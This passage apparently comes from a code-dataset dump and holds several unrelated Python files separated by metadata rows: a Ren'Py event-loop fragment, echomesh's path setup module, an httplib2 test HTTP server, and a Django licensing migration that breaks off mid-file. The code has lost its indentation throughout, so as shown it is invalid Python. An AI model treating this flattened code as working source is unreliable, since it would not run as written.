can_block = renpy.display.draw.can_block()
if self.maximum_framerate_time > get_time():
can_block = False
if (redraw_time is not None) and (not needs_redraw) and can_block:
if redraw_time != old_redraw_time:
time_left = redraw_time - get_time()
time_left = min(time_left, 3600)
_redraw_in = time_left
if time_left <= 0:
try:
pygame.event.post(self.redraw_event)
except:
pass
pygame.time.set_timer(REDRAW, 0)
else:
pygame.time.set_timer(REDRAW, max(int(time_left * 1000), 1))
old_redraw_time = redraw_time
else:
_redraw_in = 3600
pygame.time.set_timer(REDRAW, 0)
# Handle the timeout timer.
if not self.timeout_time:
pygame.time.set_timer(TIMEEVENT, 0)
else:
time_left = self.timeout_time - get_time()
time_left = min(time_left, 3600)
_timeout_in = time_left
if time_left <= 0:
self.timeout_time = None
pygame.time.set_timer(TIMEEVENT, 0)
self.post_time_event()
elif self.timeout_time != old_timeout_time:
# Always set to at least 1ms.
pygame.time.set_timer(TIMEEVENT, int(time_left * 1000 + 1))
old_timeout_time = self.timeout_time
if can_block or (frame >= renpy.config.idle_frame):
expensive = not ( needs_redraw or (_redraw_in < .2) or (_timeout_in < .2) or renpy.display.video.playing() )
self.idle_frame(can_block, expensive)
if needs_redraw or (not can_block) or self.mouse_move or renpy.display.video.playing():
renpy.plog(1, "pre peek")
ev = self.event_poll()
renpy.plog(1, "post peek {!r}", ev)
else:
renpy.plog(1, "pre wait")
ev = self.event_wait()
renpy.plog(1, "post wait {!r}", ev)
if ev.type == pygame.NOEVENT:
if can_block and (not needs_redraw) and (not self.prediction_coroutine) and (not self.mouse_move):
pygame.time.wait(1)
continue
# Recognize and ignore AltGr on Windows.
if ev.type == pygame.KEYDOWN:
if ev.key == pygame.K_LCTRL:
ev2 = self.event_peek()
if (ev2 is not None) and (ev2.type == pygame.KEYDOWN):
if ev2.key == pygame.K_RALT:
continue
# Check to see if the OS is asking us to suspend (on Android
# and iOS.)
if self.check_suspend(ev):
continue
# Try to merge an TIMEEVENT with other timeevents.
if ev.type == TIMEEVENT:
old_timeout_time = None
pygame.event.clear([TIMEEVENT])
# On Android, where we have multiple mouse buttons, we can
# merge a mouse down and mouse up event with its successor. This
# prevents us from getting overwhelmed with too many events on
# a multitouch screen.
if android and (ev.type == pygame.MOUSEBUTTONDOWN or ev.type == pygame.MOUSEBUTTONUP):
pygame.event.clear(ev.type)
# Handle redraw timeouts.
if ev.type == REDRAW:
pygame.event.clear([REDRAW])
old_redraw_time = None
continue
# Handle periodic events. This includes updating the mouse timers (and through the loop,
# the mouse itself), and the audio system periodic calls.
if ev.type == PERIODIC:
events = 1 + len(pygame.event.get([PERIODIC]))
self.ticks += events
for i in renpy.config.periodic_callbacks:
i()
renpy.audio.audio.periodic()
renpy.display.tts.periodic()
continue
# Handle quit specially for now.
if ev.type == pygame.QUIT:
self.quit_event()
continue
# Ignore KEY-events while text is being edited (usually with an IME).
if ev.type == pygame.TEXTEDITING:
if ev.text:
self.text_editing = ev
else:
self.text_editing = None
elif ev.type == pygame.TEXTINPUT:
self.text_editing = None
elif self.text_editing and ev.type in [ pygame.KEYDOWN, pygame.KEYUP ]:
continue
if ev.type == pygame.VIDEOEXPOSE:
# Needed to force the display to redraw after expose in
# the software renderer.
renpy.game.interface.full_redraw = True
renpy.game.interface.force_redraw = True
if isinstance(renpy.display.draw, renpy.display.swdraw.SWDraw):
renpy.display.draw.full_redraw = True
continue
# Handle videoresize.
if ev.type == pygame.VIDEORESIZE:
evs = pygame.event.get([pygame.VIDEORESIZE])
if len(evs):
ev = evs[-1]
# We seem to get a spurious event like this when leaving
# fullscreen mode on windows.
if ev.w < 256 or ev.h < 256:
continue
size = (ev.w // self.dpi_scale, ev.h // self.dpi_scale)
# Refresh fullscreen status (e.g. user pressed Esc. in browser)
main_window = pygame.display.get_window()
self.fullscreen = main_window is not None and bool(main_window.get_window_flags() & (pygame.WINDOW_FULLSCREEN_DESKTOP|pygame.WINDOW_FULLSCREEN))
renpy.game.preferences.fullscreen = self.fullscreen
if pygame.display.get_surface().get_size() != ev.size:
self.set_mode(size)
if not self.fullscreen:
self.last_resize = size
continue
# If we're ignoring touch events, and get a mouse up, stop
if self.ignore_touch and \
ev.type == pygame.MOUSEBUTTONUP and \
ev.button == 1:
self.ignore_touch = False
continue
if ev.type == pygame.MOUSEMOTION:
evs = pygame.event.get([pygame.MOUSEMOTION])
if len(evs):
ev = evs[-1]
if renpy.windows:
self.mouse_focused = True
if ev.type == pygame.MOUSEMOTION or \
ev.type == pygame.MOUSEBUTTONDOWN or \
ev.type == pygame.MOUSEBUTTONUP:
self.mouse_event_time = renpy.display.core.get_time()
if self.ignore_touch:
renpy.display.focus.mouse_handler(None, -1, -1, default=False)
if ev.type == pygame.ACTIVEEVENT:
if ev.state & 1:
if not ev.gain:
renpy.display.focus.clear_focus()
self.mouse_focused = ev.gain
if ev.state & 2:
self.keyboard_focused = ev.gain
if ev.state & 4:
if ev.gain:
self.restored()
else:
self.iconified()
pygame.key.set_mods(0)
x, y = renpy.display.draw.mouse_event(ev)
x, y = renpy.test.testmouse.get_mouse_pos(x, y)
ev, x, y = renpy.display.emulator.emulator(ev, x, y)
if ev is None:
continue
if not self.mouse_focused or self.ignore_touch:
x = -1
y = -1
ev = renpy.display.controller.event(ev)
if not ev:
continue
renpy.display.behavior.skipping(ev)
self.event_time = end_time = get_time()
try:
if self.touch:
renpy.display.gesture.recognizer.event(ev, x, y)
rv = renpy.display.focus.mouse_handler(ev, x, y)
if rv is None:
rv = root_widget.event(ev, x, y, 0)
if rv is None:
rv = renpy.display.focus.key_handler(ev)
if rv is not None:
break
if renpy.config.inspector:
if renpy.display.behavior.map_event(ev, "inspector"):
l = self.surftree.main_displayables_at_point(x, y, renpy.config.transient_layers + renpy.config.context_clear_layers + renpy.config.overlay_layers)
renpy.game.invoke_in_new_context(renpy.config.inspector, l)
elif renpy.display.behavior.map_event(ev, "full_inspector"):
l = self.surftree.main_displayables_at_point(x, y, renpy.config.layers)
renpy.game.invoke_in_new_context(renpy.config.inspector, l)
except IgnoreEvent:
if ev.type != TIMEEVENT:
self.post_time_event()
needs_redraw |= renpy.display.render.check_redraws()
if self.restart_interaction:
return True, None
if trans_pause and rv:
self.suppress_transition = True
# after this.
return False, rv
except EndInteraction as e:
return False, e.value
finally:
renpy.game.context().say_attributes = None
# Clean out the overlay layers.
for i in renpy.config.overlay_layers:
scene_lists.clear(i)
# Stop ongoing preloading.
renpy.display.im.cache.end_tick()
# We no longer disable periodic between interactions.
# pygame.time.set_timer(PERIODIC, 0)
pygame.time.set_timer(TIMEEVENT, 0)
pygame.time.set_timer(REDRAW, 0)
self.consider_gc()
renpy.game.context().runtime += end_time - start_time
# Restart the old interaction, which also causes a
# redraw if needed.
self.restart_interaction = True
renpy.plog(1, "end interact_core")
# print("It took", frames, "frames.")
def timeout(self, offset):
if offset < 0:
return
if self.timeout_time:
self.timeout_time = min(self.event_time + offset, self.timeout_time)
else:
self.timeout_time = self.event_time + offset
def finish_pending(self):
self.check_background_screenshot()
| true | true |
f72ecbc1483d9983735ec38c6681592f9d32e01b | 2,625 | py | Python | code/python/echomesh/base/Path.py | silky/echomesh | 2fe5a00a79c215b4aca4083e5252fcdcbd0507aa | [
"MIT"
] | 1 | 2019-06-27T11:34:13.000Z | 2019-06-27T11:34:13.000Z | code/python/echomesh/base/Path.py | silky/echomesh | 2fe5a00a79c215b4aca4083e5252fcdcbd0507aa | [
"MIT"
] | null | null | null | code/python/echomesh/base/Path.py | silky/echomesh | 2fe5a00a79c215b4aca4083e5252fcdcbd0507aa | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.base import MakeEmptyProject
from echomesh.base import Platform
import getpass
import os
import os.path
import sys
ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES = True
# If this is True, you want Echomesh to use its own external packages in
# preference to any you might have installed in your system path.
CODE_PATH = os.path.abspath(sys.path[0])
EXTERNAL_CODE_PATH = os.path.join(CODE_PATH, 'external')
ECHOMESH_PATH = os.path.dirname(os.path.dirname(CODE_PATH))
BINARY_PATH = os.path.join(ECHOMESH_PATH, 'bin', Platform.PLATFORM)
PROJECT_PATH = None
COMMAND_PATH = None
ASSET_PATH = None
_REQUIRED_DIRECTORIES = 'asset', 'cache', 'command', 'log'
def _possible_project(path):
for d in _REQUIRED_DIRECTORIES:
if not os.path.exists(os.path.join(path, d)):
return False
return True
def set_project_path(project_path=None, show_error=True, prompt=True):
original_path = os.path.abspath(os.path.expanduser(project_path or os.curdir))
path = original_path
global PROJECT_PATH, COMMAND_PATH, ASSET_PATH
while not _possible_project(path):
p = os.path.dirname(path)
if p != path:
path = p
continue
if prompt:
if MakeEmptyProject.ask_to_make_empty_project(original_path):
path = original_path
break
else:
PROJECT_PATH = None
return False
if show_error:
print("\nYour path %s isn't in an echomesh project." % original_path)
print("Defaulting to the echomesh path %s." % ECHOMESH_PATH)
path = ECHOMESH_PATH
break
PROJECT_PATH = path
COMMAND_PATH = os.path.join(path, 'command')
ASSET_PATH = os.path.join(path, 'asset')
os.chdir(path)
return True
set_project_path()
def info():
return {
'Asset path': ASSET_PATH,
'Code path': CODE_PATH,
'Command path': COMMAND_PATH,
'External code path': EXTERNAL_CODE_PATH,
'Project path': PROJECT_PATH,
'echomesh path': ECHOMESH_PATH,
}
def fix_sys_path():
for path in EXTERNAL_CODE_PATH, BINARY_PATH:
if path not in sys.path:
if ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES:
sys.path.insert(1, path)
else:
sys.path.append(path)
_HOME_VARIABLE_FIXED = False
# HACK!
def fix_home_directory_environment_variable():
if Platform.PLATFORM == Platform.DEBIAN:
global _HOME_VARIABLE_FIXED
if not _HOME_VARIABLE_FIXED:
# If running as root, export user pi's home directory as $HOME.
if getpass.getuser() == 'root':
os.environ['HOME'] = '/home/pi'
_HOME_VARIABLE_FIXED = True
| 28.846154 | 82 | 0.719238 | from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.base import MakeEmptyProject
from echomesh.base import Platform
import getpass
import os
import os.path
import sys
ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES = True
CODE_PATH = os.path.abspath(sys.path[0])
EXTERNAL_CODE_PATH = os.path.join(CODE_PATH, 'external')
ECHOMESH_PATH = os.path.dirname(os.path.dirname(CODE_PATH))
BINARY_PATH = os.path.join(ECHOMESH_PATH, 'bin', Platform.PLATFORM)
PROJECT_PATH = None
COMMAND_PATH = None
ASSET_PATH = None
_REQUIRED_DIRECTORIES = 'asset', 'cache', 'command', 'log'
def _possible_project(path):
for d in _REQUIRED_DIRECTORIES:
if not os.path.exists(os.path.join(path, d)):
return False
return True
def set_project_path(project_path=None, show_error=True, prompt=True):
original_path = os.path.abspath(os.path.expanduser(project_path or os.curdir))
path = original_path
global PROJECT_PATH, COMMAND_PATH, ASSET_PATH
while not _possible_project(path):
p = os.path.dirname(path)
if p != path:
path = p
continue
if prompt:
if MakeEmptyProject.ask_to_make_empty_project(original_path):
path = original_path
break
else:
PROJECT_PATH = None
return False
if show_error:
print("\nYour path %s isn't in an echomesh project." % original_path)
print("Defaulting to the echomesh path %s." % ECHOMESH_PATH)
path = ECHOMESH_PATH
break
PROJECT_PATH = path
COMMAND_PATH = os.path.join(path, 'command')
ASSET_PATH = os.path.join(path, 'asset')
os.chdir(path)
return True
set_project_path()
def info():
return {
'Asset path': ASSET_PATH,
'Code path': CODE_PATH,
'Command path': COMMAND_PATH,
'External code path': EXTERNAL_CODE_PATH,
'Project path': PROJECT_PATH,
'echomesh path': ECHOMESH_PATH,
}
def fix_sys_path():
for path in EXTERNAL_CODE_PATH, BINARY_PATH:
if path not in sys.path:
if ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES:
sys.path.insert(1, path)
else:
sys.path.append(path)
_HOME_VARIABLE_FIXED = False
# HACK!
def fix_home_directory_environment_variable():
if Platform.PLATFORM == Platform.DEBIAN:
global _HOME_VARIABLE_FIXED
if not _HOME_VARIABLE_FIXED:
# If running as root, export user pi's home directory as $HOME.
if getpass.getuser() == 'root':
os.environ['HOME'] = '/home/pi'
_HOME_VARIABLE_FIXED = True
| true | true |
f72eccac332916dcfea55705b3733758b36e79f1 | 3,779 | py | Python | third_party/gsutil/third_party/httplib2/python2/httplib2/test/miniserver.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | third_party/gsutil/third_party/httplib2/python2/httplib2/test/miniserver.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 4,640 | 2015-07-08T16:19:08.000Z | 2019-12-02T15:01:27.000Z | third_party/gsutil/third_party/httplib2/python2/httplib2/test/miniserver.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 698 | 2015-06-02T19:18:35.000Z | 2022-03-29T16:57:15.000Z | import logging
import os
import select
import SimpleHTTPServer
import socket
import SocketServer
import threading
HERE = os.path.dirname(__file__)
logger = logging.getLogger(__name__)
class ThisDirHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
path = path.split('?', 1)[0].split('#', 1)[0]
return os.path.join(HERE, *filter(None, path.split('/')))
def log_message(self, s, *args):
# output via logging so nose can catch it
logger.info(s, *args)
class ShutdownServer(SocketServer.TCPServer):
"""Mixin that allows serve_forever to be shut down.
The methods in this mixin are backported from SocketServer.py in the Python
2.6.4 standard library. The mixin is unnecessary in 2.6 and later, when
BaseServer supports the shutdown method directly.
"""
def __init__(self, use_tls, *args, **kwargs):
self.__use_tls = use_tls
SocketServer.TCPServer.__init__(self, *args, **kwargs)
self.__is_shut_down = threading.Event()
self.__serving = False
def server_bind(self):
SocketServer.TCPServer.server_bind(self)
if self.__use_tls:
import ssl
self.socket = ssl.wrap_socket(self.socket,
os.path.join(os.path.dirname(__file__), 'server.key'),
os.path.join(os.path.dirname(__file__), 'server.pem'),
True
)
def serve_forever(self, poll_interval=0.1):
"""Handle one request at a time until shutdown.
Polls for shutdown every poll_interval seconds. Ignores
self.timeout. If you need to do periodic tasks, do them in
another thread.
"""
self.__serving = True
self.__is_shut_down.clear()
while self.__serving:
r, w, e = select.select([self.socket], [], [], poll_interval)
if r:
self._handle_request_noblock()
self.__is_shut_down.set()
def shutdown(self):
"""Stops the serve_forever loop.
Blocks until the loop has finished. This must be called while
serve_forever() is running in another thread, or it will deadlock.
"""
self.__serving = False
self.__is_shut_down.wait()
def handle_request(self):
"""Handle one request, possibly blocking.
Respects self.timeout.
"""
# Support people who used socket.settimeout() to escape
# handle_request before self.timeout was available.
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
fd_sets = select.select([self], [], [], timeout)
if not fd_sets[0]:
self.handle_timeout()
return
self._handle_request_noblock()
def _handle_request_noblock(self):
"""Handle one request, without blocking.
I assume that select.select has returned that the socket is
readable before this function was called, so there should be
no risk of blocking in get_request().
"""
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.close_request(request)
def start_server(handler, use_tls=False):
httpd = ShutdownServer(use_tls, ("", 0), handler)
threading.Thread(target=httpd.serve_forever).start()
_, port = httpd.socket.getsockname()
return httpd, port
| 33.149123 | 79 | 0.629796 | import logging
import os
import select
import SimpleHTTPServer
import socket
import SocketServer
import threading
HERE = os.path.dirname(__file__)
logger = logging.getLogger(__name__)
class ThisDirHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
path = path.split('?', 1)[0].split('#', 1)[0]
return os.path.join(HERE, *filter(None, path.split('/')))
def log_message(self, s, *args):
logger.info(s, *args)
class ShutdownServer(SocketServer.TCPServer):
def __init__(self, use_tls, *args, **kwargs):
self.__use_tls = use_tls
SocketServer.TCPServer.__init__(self, *args, **kwargs)
self.__is_shut_down = threading.Event()
self.__serving = False
def server_bind(self):
SocketServer.TCPServer.server_bind(self)
if self.__use_tls:
import ssl
self.socket = ssl.wrap_socket(self.socket,
os.path.join(os.path.dirname(__file__), 'server.key'),
os.path.join(os.path.dirname(__file__), 'server.pem'),
True
)
def serve_forever(self, poll_interval=0.1):
self.__serving = True
self.__is_shut_down.clear()
while self.__serving:
r, w, e = select.select([self.socket], [], [], poll_interval)
if r:
self._handle_request_noblock()
self.__is_shut_down.set()
def shutdown(self):
self.__serving = False
self.__is_shut_down.wait()
def handle_request(self):
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
fd_sets = select.select([self], [], [], timeout)
if not fd_sets[0]:
self.handle_timeout()
return
self._handle_request_noblock()
def _handle_request_noblock(self):
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.close_request(request)
def start_server(handler, use_tls=False):
httpd = ShutdownServer(use_tls, ("", 0), handler)
threading.Thread(target=httpd.serve_forever).start()
_, port = httpd.socket.getsockname()
return httpd, port
| true | true |
f72ece2577e1c7ce79389ad64b2bed43d07b14b5 | 9,235 | py | Python | wildlifelicensing/apps/applications/migrations/0001_initial.py | jawaidm/wildlifelicensing | 87e8e9ab163e0d7bbb0c7a654a13ce8a4d8fcf82 | [
"Apache-2.0"
] | null | null | null | wildlifelicensing/apps/applications/migrations/0001_initial.py | jawaidm/wildlifelicensing | 87e8e9ab163e0d7bbb0c7a654a13ce8a4d8fcf82 | [
"Apache-2.0"
] | 11 | 2019-03-19T02:03:11.000Z | 2019-05-31T07:20:59.000Z | wildlifelicensing/apps/applications/migrations/0001_initial.py | jawaidm/wildlifelicensing | 87e8e9ab163e0d7bbb0c7a654a13ce8a4d8fcf82 | [
"Apache-2.0"
] | 2 | 2020-08-10T10:17:10.000Z | 2021-10-31T23:20:53.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-06-10 08:47
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Application',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customer_status', models.CharField(choices=[('draft', 'Draft'), ('under_review', 'Under Review'), ('id_required', 'Identification Required'), ('returns_required', 'Returns Completion Required'), ('amendment_required', 'Amendment Required'), ('id_and_amendment_required', 'Identification/Amendments Required'), ('id_and_returns_required', 'Identification/Returns Required'), ('returns_and_amendment_required', 'Returns/Amendments Required'), ('id_and_returns_and_amendment_required', 'Identification/Returns/Amendments Required'), ('approved', 'Approved'), ('declined', 'Declined')], default='draft', max_length=40, verbose_name='Customer Status')),
('data', django.contrib.postgres.fields.jsonb.JSONField()),
('correctness_disclaimer', models.BooleanField(default=False)),
('further_information_disclaimer', models.BooleanField(default=False)),
('lodgement_number', models.CharField(blank=True, default='', max_length=9)),
('lodgement_sequence', models.IntegerField(blank=True, default=0)),
('lodgement_date', models.DateField(blank=True, null=True)),
('processing_status', models.CharField(choices=[('draft', 'Draft'), ('new', 'New'), ('renewal', 'Renewal'), ('ready_for_action', 'Ready for Action'), ('awaiting_applicant_response', 'Awaiting Applicant Response'), ('awaiting_assessor_response', 'Awaiting Assessor Response'), ('awaiting_responses', 'Awaiting Responses'), ('ready_for_conditions', 'Ready for Conditions'), ('ready_to_issue', 'Ready to Issue'), ('issued', 'Issued'), ('declined', 'Declined')], default='draft', max_length=30, verbose_name='Processing Status')),
('id_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_update', 'Awaiting Update'), ('updated', 'Updated'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Identification Check Status')),
('returns_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_returns', 'Awaiting Returns'), ('completed', 'Completed'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Return Check Status')),
('character_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Character Check Status')),
('review_status', models.CharField(choices=[('not_reviewed', 'Not Reviewed'), ('awaiting_amendments', 'Awaiting Amendments'), ('amended', 'Amended'), ('accepted', 'Accepted')], default='not_reviewed', max_length=30, verbose_name='Review Status')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ApplicationCondition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField()),
],
),
migrations.CreateModel(
name='ApplicationLogEntry',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField(blank=True)),
('created', models.DateField(auto_now_add=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='AssessmentCondition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField()),
('acceptance_status', models.CharField(choices=[('not_specified', 'Not Specified'), ('accepted', 'Accepted'), ('declined', 'Declined')], default='not_specified', max_length=20, verbose_name='Acceptance Status')),
],
),
migrations.CreateModel(
name='AmendmentRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('status', models.CharField(choices=[('requested', 'Requested'), ('amended', 'Amended')], default='requested', max_length=30, verbose_name='Status')),
('reason', models.CharField(choices=[('insufficient_detail', 'The information provided was insufficient'), ('missing_information', 'There was missing information'), ('other', 'Other')], default='insufficient_detail', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='Assessment',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('status', models.CharField(choices=[('awaiting_assessment', 'Awaiting Assessment'), ('assessed', 'Assessed')], default='awaiting_assessment', max_length=20, verbose_name='Status')),
('comment', models.TextField(blank=True)),
('purpose', models.TextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='CustomLogEntry',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('subject', models.CharField(blank=True, max_length=200, verbose_name='Subject / Description')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='EmailLogEntry',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('subject', models.CharField(blank=True, max_length=500)),
('to', models.CharField(blank=True, max_length=500, verbose_name='To')),
('from_email', models.CharField(blank=True, max_length=200, verbose_name='From')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='IDRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('reason', models.CharField(choices=[('missing', 'There is currently no Photographic Identification uploaded'), ('expired', 'The current identification has expired'), ('not_recognised', 'The current identification is not recognised by the Department of Parks and Wildlife'), ('illegible', 'The current identification image is of poor quality and cannot be made out.'), ('other', 'Other')], default='missing', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='ReturnsRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('reason', models.CharField(choices=[('outstanding', 'There are currently outstanding returns for the previous licence'), ('other', 'Other')], default='outstanding', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
]
| 67.408759 | 666 | 0.63216 |
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Application',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customer_status', models.CharField(choices=[('draft', 'Draft'), ('under_review', 'Under Review'), ('id_required', 'Identification Required'), ('returns_required', 'Returns Completion Required'), ('amendment_required', 'Amendment Required'), ('id_and_amendment_required', 'Identification/Amendments Required'), ('id_and_returns_required', 'Identification/Returns Required'), ('returns_and_amendment_required', 'Returns/Amendments Required'), ('id_and_returns_and_amendment_required', 'Identification/Returns/Amendments Required'), ('approved', 'Approved'), ('declined', 'Declined')], default='draft', max_length=40, verbose_name='Customer Status')),
('data', django.contrib.postgres.fields.jsonb.JSONField()),
('correctness_disclaimer', models.BooleanField(default=False)),
('further_information_disclaimer', models.BooleanField(default=False)),
('lodgement_number', models.CharField(blank=True, default='', max_length=9)),
('lodgement_sequence', models.IntegerField(blank=True, default=0)),
('lodgement_date', models.DateField(blank=True, null=True)),
('processing_status', models.CharField(choices=[('draft', 'Draft'), ('new', 'New'), ('renewal', 'Renewal'), ('ready_for_action', 'Ready for Action'), ('awaiting_applicant_response', 'Awaiting Applicant Response'), ('awaiting_assessor_response', 'Awaiting Assessor Response'), ('awaiting_responses', 'Awaiting Responses'), ('ready_for_conditions', 'Ready for Conditions'), ('ready_to_issue', 'Ready to Issue'), ('issued', 'Issued'), ('declined', 'Declined')], default='draft', max_length=30, verbose_name='Processing Status')),
('id_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_update', 'Awaiting Update'), ('updated', 'Updated'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Identification Check Status')),
('returns_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_returns', 'Awaiting Returns'), ('completed', 'Completed'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Return Check Status')),
('character_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Character Check Status')),
('review_status', models.CharField(choices=[('not_reviewed', 'Not Reviewed'), ('awaiting_amendments', 'Awaiting Amendments'), ('amended', 'Amended'), ('accepted', 'Accepted')], default='not_reviewed', max_length=30, verbose_name='Review Status')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ApplicationCondition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField()),
],
),
migrations.CreateModel(
name='ApplicationLogEntry',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField(blank=True)),
('created', models.DateField(auto_now_add=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='AssessmentCondition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField()),
('acceptance_status', models.CharField(choices=[('not_specified', 'Not Specified'), ('accepted', 'Accepted'), ('declined', 'Declined')], default='not_specified', max_length=20, verbose_name='Acceptance Status')),
],
),
migrations.CreateModel(
name='AmendmentRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('status', models.CharField(choices=[('requested', 'Requested'), ('amended', 'Amended')], default='requested', max_length=30, verbose_name='Status')),
('reason', models.CharField(choices=[('insufficient_detail', 'The information provided was insufficient'), ('missing_information', 'There was missing information'), ('other', 'Other')], default='insufficient_detail', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='Assessment',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('status', models.CharField(choices=[('awaiting_assessment', 'Awaiting Assessment'), ('assessed', 'Assessed')], default='awaiting_assessment', max_length=20, verbose_name='Status')),
('comment', models.TextField(blank=True)),
('purpose', models.TextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='CustomLogEntry',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('subject', models.CharField(blank=True, max_length=200, verbose_name='Subject / Description')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='EmailLogEntry',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('subject', models.CharField(blank=True, max_length=500)),
('to', models.CharField(blank=True, max_length=500, verbose_name='To')),
('from_email', models.CharField(blank=True, max_length=200, verbose_name='From')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='IDRequest',
fields=[
